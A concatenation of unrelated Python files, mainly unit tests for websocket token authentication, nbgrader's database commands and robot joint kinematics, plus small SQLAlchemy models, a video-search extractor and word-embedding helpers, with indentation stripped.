return subscription.channel.publish(subscription.channel)
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
client = yield from ws_connect("http://localhost:9000")
yield from pub()
message = yield from client.receive()
assert message.data == subscription.channel.name
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
def test_websocket_wrapper_authentication_error():
loop = asyncio.get_event_loop()
@websocket("/", authenticate=True)
def handler(ws, params, **kwargs):
ws.send_str("hello, world!")
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
with pytest.raises(WSServerHandshakeError):
client = yield from ws_connect("http://localhost:9000")
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_wrapper_invalid_token_error():
loop = asyncio.get_event_loop()
@websocket("/", authenticate=True)
def handler(ws, params, **kwargs):
ws.send_str("hello, world!")
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
with pytest.raises(WSServerHandshakeError):
client = yield from ws_connect("http://localhost:9000?token=<PASSWORD>")
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_wrapper_valid_token(subscription):
loop = asyncio.get_event_loop()
token, _ = Token.objects.get_or_create(user=subscription.subscriber)
token = token.key
@websocket("/", authenticate=True)
def handler(ws, params, **kwargs):
assert kwargs["user"].id == subscription.subscriber.id
ws.send_str("hello, world!")
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
uri = "http://localhost:9000?token=" + token
client = yield from ws_connect(uri)
message = yield from client.receive()
assert message.data == "hello, world!"
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
def test_websocket_pubsub_wrapper_authentication_error():
loop = asyncio.get_event_loop()
@websocket_pubsub("/", authenticate=True)
def handler(ws, params, **kwargs):
ws.send_str("hello, world!")
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
with pytest.raises(WSServerHandshakeError):
client = yield from ws_connect("http://localhost:9000")
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_pubsub_wrapper_invalid_token_error():
loop = asyncio.get_event_loop()
@websocket_pubsub("/", authenticate=True)
def handler(ws, params, **kwargs):
ws.send_str("hello, world!")
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
with pytest.raises(WSServerHandshakeError):
client = yield from ws_connect("http://localhost:9000?token=<PASSWORD>")
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_pubsub_wrapper_valid_token(subscription):
loop = asyncio.get_event_loop()
token, _ = Token.objects.get_or_create(user=subscription.subscriber)
token = token.key
@websocket_pubsub("/", authenticate=True)
def handler(ws, params, **kwargs):
assert kwargs["user"].id == subscription.subscriber.id
reader = subscription.get_reader(kwargs["manager"])
@reader.callback
def send_message(channel_name, model):
ws.send_str(model.name)
return False
listener = yield from reader.listen()
yield from asyncio.gather(listener)
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def pub():
yield from asyncio.sleep(1) # wait a second for the listener to start
return subscription.channel.publish(subscription.channel)
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
uri = "http://localhost:9000?token=" + token
client = yield from ws_connect(uri)
yield from pub()
message = yield from client.receive()
assert message.data == subscription.channel.name
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_all_subscriptions(subscription):
loop = asyncio.get_event_loop()
token, _ = Token.objects.get_or_create(user=subscription.subscriber)
token = token.key
message = mommy.make(Message,
channel=subscription.channel,
to_user=subscription.subscriber)
@websocket_pubsub("/", authenticate=True)
def subscriptions(ws, params, user, manager):
def callback(channel_name, model):
ws.send_str(model.serialize())
return False
yield from manager.listen_to_all_subscriptions(user, callback)
while True:
message = yield from ws.receive()
if message.tp in (MsgType.error, MsgType.close):
break
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*subscriptions.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
uri = "http://localhost:9000?token=" + token
client = yield from ws_connect(uri)
yield from asyncio.sleep(1)
message.save()
message_ = yield from client.receive()
data = json.loads(message_.data)
message.refresh_from_db()
assert data[0]["pk"] == message.pk
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
|
1688935
|
from typing import Callable
from indexpy.utils.register import RegisterDict
def test_register_dict():
d: RegisterDict[str, Callable] = RegisterDict()
@d.register("foo")
def foo():
pass
assert d["foo"] is foo
|
1688973
|
import pytest
import datetime
import shutil
import os
from textwrap import dedent
from os.path import join
from ...api import Gradebook, MissingEntry
from .. import run_nbgrader
from .base import BaseTestApp
class TestNbGraderDb(BaseTestApp):
def test_help(self):
"""Does the help display without error?"""
run_nbgrader(["db", "--help-all"])
run_nbgrader(["db", "student", "--help-all"])
run_nbgrader(["db", "student", "list", "--help-all"])
run_nbgrader(["db", "student", "remove", "--help-all"])
run_nbgrader(["db", "student", "add", "--help-all"])
run_nbgrader(["db", "student", "import", "--help-all"])
run_nbgrader(["db", "assignment", "--help-all"])
run_nbgrader(["db", "assignment", "list", "--help-all"])
run_nbgrader(["db", "assignment", "remove", "--help-all"])
run_nbgrader(["db", "assignment", "add", "--help-all"])
run_nbgrader(["db", "assignment", "import", "--help-all"])
def test_no_args(self):
"""Is there an error if no arguments are given?"""
run_nbgrader(["db"], retcode=0)
run_nbgrader(["db", "student"], retcode=0)
run_nbgrader(["db", "student", "remove"], retcode=1)
run_nbgrader(["db", "student", "add"], retcode=1)
run_nbgrader(["db", "student", "import"], retcode=1)
run_nbgrader(["db", "assignment"], retcode=0)
run_nbgrader(["db", "assignment", "remove"], retcode=1)
run_nbgrader(["db", "assignment", "add"], retcode=1)
run_nbgrader(["db", "assignment", "import"], retcode=1)
def test_student_add(self, db):
run_nbgrader(["db", "student", "add", "foo", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name is None
assert student.first_name is None
assert student.email is None
run_nbgrader(["db", "student", "add", "foo", "--last-name=FooBar", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name == "FooBar"
assert student.first_name is None
assert student.email is None
run_nbgrader(["db", "student", "add", "foo", "--first-name=FooBar", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name is None
assert student.first_name == "FooBar"
assert student.email is None
run_nbgrader(["db", "student", "add", "foo", "--email=<EMAIL>", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name is None
assert student.first_name is None
assert student.email == "<EMAIL>"
def test_student_remove(self, db):
run_nbgrader(["db", "student", "add", "foo", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name is None
assert student.first_name is None
assert student.email is None
run_nbgrader(["db", "student", "remove", "foo", "--db", db])
with Gradebook(db) as gb:
with pytest.raises(MissingEntry):
gb.find_student("foo")
# running it again should give an error
run_nbgrader(["db", "student", "remove", "foo", "--db", db], retcode=1)
def test_student_remove_with_submissions(self, db, course_dir):
run_nbgrader(["db", "student", "add", "foo", "--db", db])
run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
run_nbgrader(["generate_assignment", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
run_nbgrader(["autograde", "ps1", "--db", db])
with Gradebook(db) as gb:
gb.find_student("foo")
# it should fail if we don't run with --force
run_nbgrader(["db", "student", "remove", "foo", "--db", db], retcode=1)
# make sure we can still find the student
with Gradebook(db) as gb:
gb.find_student("foo")
# now force it to complete
run_nbgrader(["db", "student", "remove", "foo", "--force", "--db", db])
# student should be gone
with Gradebook(db) as gb:
with pytest.raises(MissingEntry):
gb.find_student("foo")
def test_student_remove_with_submissions_f(self, db, course_dir):
run_nbgrader(["db", "student", "add", "foo", "--db", db])
run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
run_nbgrader(["generate_assignment", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
run_nbgrader(["autograde", "ps1", "--db", db])
with Gradebook(db) as gb:
gb.find_student("foo")
# it should fail if we don't run with --force
run_nbgrader(["db", "student", "remove", "foo", "--db", db], retcode=1)
# make sure we can still find the student
with Gradebook(db) as gb:
gb.find_student("foo")
# now force it to complete
run_nbgrader(["db", "student", "remove", "foo", "-f", "--db", db])
# student should be gone
with Gradebook(db) as gb:
with pytest.raises(MissingEntry):
gb.find_student("foo")
def test_student_list(self, db):
run_nbgrader(["db", "student", "add", "foo", "--first-name=abc", "--last-name=xyz", "--email=<EMAIL>", "--db", db])
run_nbgrader(["db", "student", "add", "bar", "--db", db])
out = run_nbgrader(["db", "student", "list", "--db", db], stdout=True)
assert out == dedent(
"""
There are 2 students in the database:
bar (None, None) -- None, None
foo (xyz, abc) -- <EMAIL>, None
"""
).strip() + "\n"
def test_student_import(self, db, temp_cwd):
with open("students.csv", "w") as fh:
fh.write(dedent(
"""
id,first_name,last_name,email
foo,abc,xyz,<EMAIL>
bar,,,
"""
).strip())
run_nbgrader(["db", "student", "import", "students.csv", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name == "xyz"
assert student.first_name == "abc"
assert student.email == "<EMAIL>"
student = gb.find_student("bar")
assert student.last_name is None
assert student.first_name is None
assert student.email is None
# check that it fails when no id column is given
with open("students.csv", "w") as fh:
fh.write(dedent(
"""
first_name,last_name,email
abc,xyz,<EMAIL>
,,
"""
).strip())
run_nbgrader(["db", "student", "import", "students.csv", "--db", db], retcode=1)
# check that it works ok with extra and missing columns
with open("students.csv", "w") as fh:
fh.write(dedent(
"""
id,first_name,last_name,foo
foo,abc,xyzzzz,blah
bar,,,
"""
).strip())
run_nbgrader(["db", "student", "import", "students.csv", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name == "xyzzzz"
assert student.first_name == "abc"
assert student.email == "<EMAIL>"
student = gb.find_student("bar")
assert student.last_name is None
assert student.first_name is None
assert student.email is None
def test_student_import_csv_spaces(self, db, temp_cwd):
with open("students.csv", "w") as fh:
fh.write(dedent(
"""
id,first_name,last_name, email
foo,abc,xyz,<EMAIL>
bar,,,
"""
).strip())
run_nbgrader(["db", "student", "import", "students.csv", "--db", db])
with Gradebook(db) as gb:
student = gb.find_student("foo")
assert student.last_name == "xyz"
assert student.first_name == "abc"
assert student.email == "<EMAIL>"
student = gb.find_student("bar")
assert student.last_name is None
assert student.first_name is None
assert student.email is None
def test_assignment_add(self, db):
run_nbgrader(["db", "assignment", "add", "foo", "--db", db])
with Gradebook(db) as gb:
assignment = gb.find_assignment("foo")
assert assignment.duedate is None
run_nbgrader(["db", "assignment", "add", "foo", '--duedate="Sun Jan 8 2017 4:31:22 PM"', "--db", db])
with Gradebook(db) as gb:
assignment = gb.find_assignment("foo")
assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)
def test_assignment_remove(self, db):
run_nbgrader(["db", "assignment", "add", "foo", "--db", db])
with Gradebook(db) as gb:
assignment = gb.find_assignment("foo")
assert assignment.duedate is None
run_nbgrader(["db", "assignment", "remove", "foo", "--db", db])
with Gradebook(db) as gb:
with pytest.raises(MissingEntry):
gb.find_assignment("foo")
# running it again should give an error
run_nbgrader(["db", "assignment", "remove", "foo", "--db", db], retcode=1)
def test_assignment_remove_with_submissions(self, db, course_dir):
run_nbgrader(["db", "student", "add", "foo", "--db", db])
run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
run_nbgrader(["generate_assignment", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
run_nbgrader(["autograde", "ps1", "--db", db])
with Gradebook(db) as gb:
gb.find_assignment("ps1")
# it should fail if we don't run with --force
run_nbgrader(["db", "assignment", "remove", "ps1", "--db", db], retcode=1)
# make sure we can still find the assignment
with Gradebook(db) as gb:
gb.find_assignment("ps1")
# now force it to complete
run_nbgrader(["db", "assignment", "remove", "ps1", "--force", "--db", db])
# assignment should be gone
with Gradebook(db) as gb:
with pytest.raises(MissingEntry):
gb.find_assignment("ps1")
def test_assignment_remove_with_submissions_f(self, db, course_dir):
run_nbgrader(["db", "student", "add", "foo", "--db", db])
run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
run_nbgrader(["generate_assignment", "ps1", "--db", db])
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
run_nbgrader(["autograde", "ps1", "--db", db])
with Gradebook(db) as gb:
gb.find_assignment("ps1")
# it should fail if we don't run with --force
run_nbgrader(["db", "assignment", "remove", "ps1", "--db", db], retcode=1)
# make sure we can still find the assignment
with Gradebook(db) as gb:
gb.find_assignment("ps1")
# now force it to complete
run_nbgrader(["db", "assignment", "remove", "ps1", "-f", "--db", db])
# assignment should be gone
with Gradebook(db) as gb:
with pytest.raises(MissingEntry):
gb.find_assignment("ps1")
def test_assignment_list(self, db):
run_nbgrader(["db", "assignment", "add", "foo", '--duedate="Sun Jan 8 2017 4:31:22 PM"', "--db", db])
run_nbgrader(["db", "assignment", "add", "bar", "--db", db])
out = run_nbgrader(["db", "assignment", "list", "--db", db], stdout=True)
assert out == dedent(
"""
There are 2 assignments in the database:
bar (due: None)
foo (due: 2017-01-08 16:31:22)
"""
).strip() + "\n"
def test_assignment_import(self, db, temp_cwd):
with open("assignments.csv", "w") as fh:
fh.write(dedent(
"""
name,duedate
foo,Sun Jan 8 2017 4:31:22 PM
bar,
"""
).strip())
run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db])
with Gradebook(db) as gb:
assignment = gb.find_assignment("foo")
assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)
assignment = gb.find_assignment("bar")
assert assignment.duedate is None
def test_assignment_import_csv_spaces(self, db, temp_cwd):
with open("assignments.csv", "w") as fh:
fh.write(dedent(
"""
name, duedate
foo,Sun Jan 8 2017 4:31:22 PM
bar,
"""
).strip())
run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db])
with Gradebook(db) as gb:
assignment = gb.find_assignment("foo")
assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)
assignment = gb.find_assignment("bar")
assert assignment.duedate is None
# check that it fails when no id column is given
with open("assignments.csv", "w") as fh:
fh.write(dedent(
"""
duedate
Sun Jan 8 2017 4:31:22 PM
,
"""
).strip())
run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db], retcode=1)
# check that it works ok with extra and missing columns
with open("assignments.csv", "w") as fh:
fh.write(dedent(
"""
name
foo
bar
"""
).strip())
run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db])
with Gradebook(db) as gb:
assignment = gb.find_assignment("foo")
assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)
assignment = gb.find_assignment("bar")
assert assignment.duedate is None
def test_upgrade_nodb(self, temp_cwd):
# test upgrading without a database
run_nbgrader(["db", "upgrade"])
def test_upgrade_current_db(self, course_dir):
# add assignment files
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
# check that nbgrader generate_assignment passes
run_nbgrader(["generate_assignment", "ps1"])
# test upgrading with a current database
run_nbgrader(["db", "upgrade"])
def test_upgrade_old_db_no_assign(self, course_dir):
# add assignment files
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
# replace the gradebook with an old version
self._copy_file(join("files", "gradebook.db"), join(course_dir, "gradebook.db"))
# upgrade the database
run_nbgrader(["db", "upgrade"])
# check that nbgrader assign passes
run_nbgrader(["assign", "ps1"])
def test_upgrade_old_db(self, course_dir):
# add assignment files
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
# replace the gradebook with an old version
self._copy_file(join("files", "gradebook.db"), join(course_dir, "gradebook.db"))
# check that nbgrader generate_assignment fails
run_nbgrader(["generate_assignment", "ps1"], retcode=1)
# upgrade the database
run_nbgrader(["db", "upgrade"])
# check that nbgrader generate_assignment passes
run_nbgrader(["generate_assignment", "ps1"])
|
1689019
|
import math, unittest
from collections import namedtuple
from robot import constant
from robot.mech.exceptions import InvalidJointAngleError, InvalidJointDictError
from robot.mech.joint import DenavitHartenberg, JointLimits, Joint
from spatial import Transform, Vector3
def create_dummy_dict(dh: dict = None, limits: dict = None, home: int = None):
"""Create a sample dictionary with all of the DH fields present."""
defaults = {
tup: {k: v for k, v in zip(tup._fields, range(0, len(tup._fields)))}
for tup in (DenavitHartenberg, JointLimits)
}
defaults['home'] = 0
return {
'dh': dh if dh is not None else defaults[DenavitHartenberg],
'limits': limits if limits is not None else defaults[JointLimits],
'home': home if home is not None else defaults['home']
}
class TestJoint(unittest.TestCase):
def setUp(self):
dh = DenavitHartenberg(math.radians(45), 50, math.radians( 180), 72)
limits = JointLimits(math.radians(400), math.radians(-400))
home = math.radians(45)
self.joint = Joint(dh, limits, home)
def test_init_swaps_limits(self):
expected = JointLimits(math.radians(-400), math.radians(400))
for component in self.joint.limits._fields:
self.assertEqual(getattr(self.joint.limits, component), getattr(expected, component))
def test_joint_angle_defaults_to_home_value(self):
self.assertEqual(self.joint.angle, self.joint.home)
def test_joint_home_defaults_to_zero(self):
d = create_dummy_dict()
del d['home']
joint = Joint.from_dict(d)
self.assertAlmostEqual(joint.home, 0)
def test_init_home_defaults_to_lower_limit_if_home_is_outside_joint_limits(self):
d = create_dummy_dict(home = 100)
joint = Joint.from_dict(d)
self.assertAlmostEqual(joint.home, joint.limits.low)
def test_immovable_is_identity_transform(self):
joint = Joint.Immovable()
self.assertEqual(joint.transform.dual, Transform.Identity().dual)
def test_from_dict_converts_degrees_to_radians(self):
d = create_dummy_dict()
joint = Joint.from_dict(d)
self.assertAlmostEqual(joint.dh.alpha, math.radians(d['dh']['alpha']))
self.assertAlmostEqual(joint.dh.theta, math.radians(d['dh']['theta']))
self.assertAlmostEqual(joint.limits.low, math.radians(d['limits']['low']))
self.assertAlmostEqual(joint.limits.high, math.radians(d['limits']['high']))
self.assertAlmostEqual(joint.home, math.radians(d['home']))
def test_from_dict_raises_on_missing_dh_key(self):
fields = self.joint.dh._fields
for field in fields:
with self.subTest(msg=f'Remove `{field}` from dictionary'):
d = create_dummy_dict()
del d['dh'][field]
with self.assertRaises(InvalidJointDictError):
Joint.from_dict(d)
def test_from_dict_handles_limits_key(self):
TestSpec = namedtuple('TestSpec', 'name input_dict')
tests = [
TestSpec("No limits", {}),
TestSpec("Low only", { 'low': 10 }),
TestSpec("High only", { 'high': 20 }),
TestSpec("Both limits", { 'low': 10, 'high': 20 }),
TestSpec("Junk limits", { 'Junk': 'Limits' })
]
defaults = { 'low': -math.inf, 'high': math.inf }
for test in tests:
d = create_dummy_dict(limits=test.input_dict)
joint = Joint.from_dict(d)
expecteds = {
**defaults,
**{
k: math.radians(v)
for k, v in test.input_dict.items()
if k in JointLimits._fields
}
}
for field in JointLimits._fields:
with self.subTest(msg=f"{test.name}: `{field}` not as expected"):
self.assertEqual(getattr(joint.limits, field), expecteds.get(field))
def test_set_angle_set_valid_angles_and_raises_for_exceeding_limits(self):
with self.subTest(f"Valid angle is accepted"):
valid_angle = (self.joint.limits.high + self.joint.limits.low) / 2
self.joint.set_angle(valid_angle)
self.assertAlmostEqual(self.joint.angle, valid_angle)
with self.subTest(f"Invalid angle raises exception"):
invalid_angle = self.joint.limits.high + abs(self.joint.limits.low)
with self.assertRaises(InvalidJointAngleError):
self.joint.set_angle(invalid_angle)
def test_set_angle_accepts_normalized_values(self):
valid_angles = [0, 0.5, 1]
for valid_angle in valid_angles:
with self.subTest(f'Valid value {valid_angle}'):
self.joint.set_angle(valid_angle, normalized=True)
normalized = valid_angle * self.joint.travel + self.joint.limits.low
self.assertAlmostEqual(self.joint.angle, normalized)
invalid_angles = [-1, 2]
for invalid_angle in invalid_angles:
with self.subTest(f'Invalid angle {invalid_angle}'):
with self.assertRaises(AssertionError):
self.joint.set_angle(invalid_angle, normalized=True)
def test_normalized_angle_returns_value_between_zero_and_one(self):
angles = [
(self.joint.limits.low, 0),
(self.joint.limits.high, 1),
(self.joint.travel / 4 + self.joint.limits.low, 0.25),
]
for angle, normalized_angle in angles:
with self.subTest(f'Angle {math.degrees(angle)}'):
self.joint.set_angle(angle)
self.assertAlmostEqual(normalized_angle, self.joint.normalized_angle)
def test_transform_constructs_transform_for_joint_angle(self):
self.joint.angle = math.radians(30)
theta = Transform.from_axis_angle_translation(axis = Vector3.Z(), angle = self.joint.dh.theta + self.joint.angle)
alpha = Transform.from_axis_angle_translation(axis = Vector3.X(), angle = self.joint.dh.alpha)
d = Transform.from_axis_angle_translation(translation = Vector3(0, 0, self.joint.dh.d))
a = Transform.from_axis_angle_translation(translation = Vector3(self.joint.dh.a, 0, 0))
expected = d * theta * a * alpha
self.assertAlmostEqual(self.joint.transform.dual, expected.dual)
def test_travel_returns_amount_of_travel_between_limits(self):
expected = self.joint.limits.high - self.joint.limits.low
self.assertAlmostEqual(self.joint.travel, expected)
def test_travel_in_revs_returns_amount_of_travel_in_integer_revolutions(self):
expected = math.floor((self.joint.limits.high - self.joint.limits.low) / (2 * math.pi))
self.assertEqual(self.joint.travel_in_revs, expected)
def test_within_limits_checks_floating_point_angles(self):
# Generate an angle guaranteed to be inside joint limits
inside = (self.joint.limits.high - self.joint.limits.low) / 2
self.assertTrue(self.joint.within_limits(inside))
# Generate an angle guaranteed to be outside joint limits
outside = (self.joint.limits.high + abs(self.joint.limits.low))
self.assertFalse(self.joint.within_limits(outside))
def test_within_limits_returns_true_for_singular_values(self):
# Useful for checking limits on the inverse kinematic results
# Some axes will have singular solutions (meaning infinitely many)
# So clearly the solution should be considered within limits
self.assertTrue(self.joint.within_limits(constant.SINGULAR))
|
1689025
|
import logging
import string
import numpy as np
from ...tools.constants import DISEASE_PLACEHOLDER
from ...tools.constants import GENE_PLACEHOLDER
module_logger = logging.getLogger(__name__)
def generate_embedding_matrix(sentences_tokenized, word_vectors, word_to_index, max_length, min_words_mapped=0,
replace_disease_gene_tokens=True):
"""
Generate word vector matrix for a set of tokenized sentences by creating a feature matrix of word vectors.
:param sentences_tokenized: list of list of strings - the tokenized sentences
:param word_vectors: dict mapping integer word indices to their word vectors
:param word_to_index: dict mapping words to their integer index in word_vectors
:param max_length: the maximal number of words to be be converted to word vectors in each sentence
:param min_words_mapped: the minimal number of words (not counting tokens representing tagged diseases and genes)
that need to be mapped to word vectors in each sentence. If fewer words are mapped in a given sentence,
the matrix corresponding to the sentence is filled with numpy NaNs.
:param replace_disease_gene_tokens: boolean indicating if tokens representing tagged diseases and genes
are mapped to the word vectors for 'disease' and 'gene', respectively. If False, the tokens are ignored.
:return: a three dimensional numpy array, first dimension is sentence, second is word, third is word vector
"""
n_samples = len(sentences_tokenized)
vector_dim = len(word_vectors[0])
embedding_matrix = np.zeros((n_samples, max_length, vector_dim))
for i, sentence in enumerate(sentences_tokenized):
words_mapped = 0
for j, word in enumerate(sentence):
if j >= max_length:
break
if word not in word_to_index and replace_disease_gene_tokens and word == DISEASE_PLACEHOLDER.lower():
embedding_matrix[i, j] = word_vectors[word_to_index['disease']]
elif word not in word_to_index and replace_disease_gene_tokens and word == GENE_PLACEHOLDER.lower():
embedding_matrix[i, j] = word_vectors[word_to_index['gene']]
elif word in word_to_index:
words_mapped += 1
embedding_matrix[i, j] = word_vectors[word_to_index[word]]
if words_mapped < min_words_mapped:
embedding_matrix[i, :, :] = np.full((max_length, vector_dim), np.nan)
return embedding_matrix
def get_sentence_vector_array(sentences_tokenized, word_vectors, word_to_index, min_vector_count, remove_punctuation,
replace_disease_gene_tokens=True):
# :param replace_disease_gene_tokens: boolean indicating if tokens representing tagged diseases and genes
# are mapped to the word vectors for 'disease' and 'gene', respectively. If False, the tokens are ignored.
# simply average all word vectors corresponding to words in the sentence
vector_dim = len(word_vectors[0])
sentence_array = np.zeros((len(sentences_tokenized), vector_dim))
for sentence_index, sentence in enumerate(sentences_tokenized):
vector_count = 0
sentence_vec = np.zeros(vector_dim)
for word in sentence:
if remove_punctuation and word.strip() in string.punctuation:
continue
if word not in word_to_index and replace_disease_gene_tokens and word == DISEASE_PLACEHOLDER.lower():
vector_count += 1
sentence_vec += word_vectors[word_to_index['disease']]
elif word not in word_to_index and replace_disease_gene_tokens and word == GENE_PLACEHOLDER.lower():
vector_count += 1
sentence_vec += word_vectors[word_to_index['gene']]
elif word in word_to_index:
vector_count += 1
sentence_vec += word_vectors[word_to_index[word]]
if vector_count < min_vector_count:
sentence_vec = np.full(vector_dim, np.nan)
module_logger.warning('Following sentence could not be represented as a vector since only {:d} words were '
'mapped to vectors: {}'.format(vector_count, ' '.join(sentence)))
sentence_array[sentence_index] = sentence_vec / vector_count
return sentence_array
|
1689088
|
import itertools
import re
from .common import SearchInfoExtractor
class GoogleSearchIE(SearchInfoExtractor):
IE_DESC = 'Google Video search'
IE_NAME = 'video.google:search'
_SEARCH_KEY = 'gvsearch'
_TESTS = [{
'url': 'gvsearch15:python language',
'info_dict': {
'id': 'python language',
'title': 'python language',
},
'playlist_count': 15,
}]
_PAGE_SIZE = 100
def _search_results(self, query):
for pagenum in itertools.count():
webpage = self._download_webpage(
'http://www.google.com/search', f'gvsearch:{query}',
note=f'Downloading result page {pagenum + 1}',
query={
'tbm': 'vid',
'q': query,
'start': pagenum * self._PAGE_SIZE,
'num': self._PAGE_SIZE,
'hl': 'en',
})
for url in re.findall(r'<div[^>]* class="dXiKIc"[^>]*><a href="([^"]+)"', webpage):
yield self.url_result(url)
if not re.search(r'id="pnnext"', webpage):
return
|
1689209
|
import sqlalchemy as sa
from karmabot.db.modelbase import SqlAlchemyBase
class KarmaUser(SqlAlchemyBase):
"""Models a slack user with karma in the DB"""
__tablename__ = "karma_user"
user_id = sa.Column(sa.String, primary_key=True)
username = sa.Column(sa.String)
karma_points = sa.Column(sa.Integer, default=0)
def formatted_user_id(self):
"""Formats user id for use in slack messages"""
return f"<@{self.user_id}>"
def __repr__(self):
return (
f"<KarmaUser> ID: {self.user_id} | Username: {self.username} | "
f"Karma-Points: {self.karma_points}"
)
|
1689226
|
from sqlalchemy import Column, event, Index, Integer, String
from rdr_service.model.base import Base, model_insert_listener
from rdr_service.model.utils import UTCDateTime
class ApiUser(Base):
__tablename__ = "api_user"
id = Column("id", Integer, primary_key=True, autoincrement=True, nullable=False)
created = Column("created", UTCDateTime)
system = Column("system", String(80), nullable=False)
username = Column('username', String(255), nullable=False)
Index('api_username_system', ApiUser.system, ApiUser.username)
event.listen(ApiUser, "before_insert", model_insert_listener)
|
1689267
|
from unittest import TestCase
from jsonmapping import StatementsVisitor
from .util import resolver, fixture_uri
def load_maker(stmts):
def _load(subject):
for (s, p, o, t) in stmts:
if s == subject:
yield {
'subject': s,
'predicate': p,
'object': o,
'type': t,
'source': 'foo'
}
return _load
class StatementsTestCase(TestCase):
def setUp(self):
self.mapping, self.uri = fixture_uri('everypol/mapping.json')
self.schema_uri = 'http://www.popoloproject.com/schemas/person.json#'
self.schema = {'$ref': self.schema_uri}
resolver.store[self.uri] = self.mapping
super(StatementsTestCase, self).setUp()
def test_basic_statement_conversion(self):
sv = StatementsVisitor(self.schema, resolver)
data = {
'name': 'The Count'
}
stmts = list(sv.triplify(data))
assert len(stmts) == 2, len(stmts)
subj = [a for a, _, _, _ in stmts]
assert len(set(subj)) == 1, subj
assert subj[0].startswith('urn:uuid'), subj
def test_subject_properties(self):
sv = StatementsVisitor(self.schema, resolver)
data = {
'id': 'the-count',
'name': 'The Count'
}
stmts = list(sv.triplify(data))
assert len(stmts) == 3, len(stmts)
subj = [a for a, _, _, _ in stmts]
assert len(set(subj)) == 1, subj
